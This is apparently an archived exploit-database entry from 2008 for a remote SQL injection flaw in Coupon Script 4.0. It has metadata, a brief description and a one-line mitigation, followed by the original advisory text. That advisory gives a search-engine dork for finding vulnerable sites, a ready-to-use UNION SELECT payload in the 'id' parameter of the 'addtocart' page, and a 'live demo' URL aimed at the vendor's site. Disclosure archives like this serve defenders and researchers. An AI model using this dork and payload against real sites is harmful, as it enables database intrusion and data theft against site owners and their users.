Coupon Script 4.0 (id) Remote SQL Injection Vulnerability

vendor:

Coupon Script 4.0

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Coupon Script 4.0

Affected Version From: 4

Affected Version To: 4

Patch Exists: YES

Related CWE: N/A

CPE: a:couponscript:coupon_script_4.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Coupon Script 4.0 (id) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The crafted request contains malicious SQL statements in the 'id' parameter of the 'addtocart' page. This can allow an attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| Coupon Script 4.0 (id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author:  Hussin X
|
|    Home :  WwW.Hussin-X.CoM  |  WwW.tryag.CoM
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.couponscript.com/
|
| DorK   :  inurl:couponsite/index.php?page=
|___________________________________________________|

Exploit: 
________



www.[target].com/Script/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*




L!VE DEMO:
_________


http://couponscript.com/couponsite/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*







____________________________( Greetz )_________________________________
|
|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
|  
|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
|______________________________________________________________________
 

                       Im IRAQi

# milw0rm.com [2008-09-02]